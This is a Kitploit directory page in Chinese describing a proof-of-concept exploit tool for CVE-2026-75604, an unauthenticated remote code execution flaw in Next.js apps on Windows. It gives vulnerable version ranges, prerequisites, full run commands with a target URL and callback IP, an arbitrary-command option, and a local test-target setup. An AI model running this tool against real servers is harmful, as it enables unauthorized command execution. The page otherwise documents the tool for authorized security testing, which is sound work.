Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-75604-poc — CVE-2026-75604 的概念验证漏洞利用程序,针对 Windows 托管的 Next.js 应用中的未认证远程代码执行漏洞,支持基于回调的命令执行及本地目标环境搭建。 | Kitploit
工具/GitHubGitHub/rafabd1/cve-2026-75604-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问木马
GitHubrafabd1/cve-2026-75604-poc

CVE-2026-75604-poc

CVE-2026-75604 的概念验证漏洞利用程序,针对 Windows 托管的 Next.js 应用中的未认证远程代码执行漏洞,支持基于回调的命令执行及本地目标环境搭建。

查看仓库
341天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-75604 RCE PoC

针对 CVE-2026-75604 的 Python 概念验证,该漏洞是 Windows 主机上同时使用 Pages Router 和 App Router(未启用 Cache Components)的 Next.js 应用中的未认证远程命令执行漏洞。

演示

CVE-2026-75604 RCE 概念验证

环境要求

  • Next.js >=13.4 <15.5.24 或 >=16.0 <16.3.3
  • 原生 Windows 服务器
  • Pages Router 和 App Router(未启用 Cache Components)
  • 默认文件系统缓存,包含动态 Pages ISR 路由和动态缓存 App 路由
  • 兼容的闭包绑定 Server Action
  • Python 3.9+ 以及目标可访问的回调地址

已在 [email protected] 上验证通过。

root@kitploit:~
python -m pip install -r requirements.txt

使用方法

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

Server Action 路径默认为 /。当其表单包含多个字段时,请使用 --action-field。

必需参数:

  • --target URL:Next.js 应用的基础 URL
  • --callback-ip ADDRESS:目标可访问的 IPv4 地址
  • --pages-cache-path PATH:现有的动态 Pages Router ISR 页面
  • --app-cache-path PATH:由文件系统缓存支持的现有动态 App Router 页面

可选参数:

  • --command COMMAND:要执行的命令;默认为 whoami
  • --action-path PATH:包含兼容 Server Action 的 App Router 页面;默认为 /
  • --action-field NAME:action 消费的表单字段;在无歧义时自动检测
  • --callback-port PORT:回调端口;默认为 4331
  • --listen-address ADDRESS:本地回调绑定地址;默认为 0.0.0.0
  • --timeout SECONDS:请求和回调超时时间;默认为 20
  • --insecure:禁用 TLS 证书验证

本地目标

可选的 target/ 应用固定使用 [email protected],并采用标准 Next.js 生产服务器:

root@kitploit:~
cd target
npm ci
npm run build
npm start

在另一个终端中运行 PoC:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

可选目标提供了所需的路由以及位于 / 的兼容 Server Action。

免责声明

本 PoC 仅供教育目的、安全研究和授权测试使用。请仅在您拥有或已获得明确测试许可的系统上使用。

致谢

感谢 evolutionstorm。

本 PoC 是根据公开公告和 Next.js 补丁 独立重建的。

下载工具